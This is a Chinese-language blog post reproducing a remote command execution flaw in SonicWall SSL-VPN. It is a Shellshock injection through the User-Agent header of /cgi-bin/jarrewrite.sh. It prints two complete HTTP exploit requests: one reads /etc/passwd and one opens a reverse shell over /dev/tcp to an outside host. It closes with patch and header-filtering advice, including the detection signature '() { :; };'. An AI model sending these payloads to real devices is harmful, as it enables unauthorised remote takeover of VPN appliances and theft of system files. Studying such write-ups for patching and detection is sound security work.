SonicWall SSL-VPN 远程命令执行漏洞
一、漏洞描述
SonicWall SSL-VPN 历史版本远程命令执行漏洞以及相关利用脚本。由于SonicWall SSL-VPN使用了旧版本内核以及HTTP CGI 可执行程序,攻击者可构造恶意其HTTP请求头,造成远程任意命令执行,并获得主机控制权限
二、漏洞复现
exp:
GET /cgi-bin/jarrewrite.sh HTTP/1.1 Host: thelostworld:8080 User-Agent: () { :; }; echo ; /bin/bash -c “cat /etc/passwd” Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close
访问执行查看:cat /etc/passwd
执行反弹shell
GET /cgi-bin/jarrewrite.sh HTTP/1.1 Host: thelostworld:8080 User-Agent: () { :; }; echo ; /bin/bash -c “nohup bash -i >& /dev/tcp/thelostworld/8080 0>&1 &” Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close
成功获取到shell:
简单的脚本尝试验证:
执行打印:
三、防护修补建议
通用修补建议
升级到 Sonic SMA 8.0.0.4
临时修补建议
针对 http header 进行检测
可能存在的特征字符串如下() { :; };
使用 nginx 反向代理对 header 进行强制过滤
location/cgi-bin/jarrewrite.sh {proxy_passhttp://your-ssl-vpn:your-ssl-vpn-port$request_uri;proxy_set_headerhost$http_host;proxy_set_headeruser-agent”sonicwall ssl-vpn rec fix”;}
参考:
https://my.oschina.net/u/4600927/blog/4927559
免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
转载声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。
订阅查看更多复现文章、学习笔记
thelostworld
安全路上,与你并肩前行!!!!
个人知乎:https://www.zhihu.com/people/fu-wei-43-69/columns
个人简书:https://www.jianshu.com/u/bf0e38a8d400
个人CSDN:https://blog.csdn.net/qq_37602797/category_10169006.html
个人博客园:https://www.cnblogs.com/thelostworld/
FREEBUF主页:https://www.freebuf.com/author/thelostworld?type=article
欢迎添加本公众号作者微信交流,添加时备注一下“公众号”
来源:freebuf.com 2021-01-28 23:16:40 by: thelostworld
请登录后发表评论
注册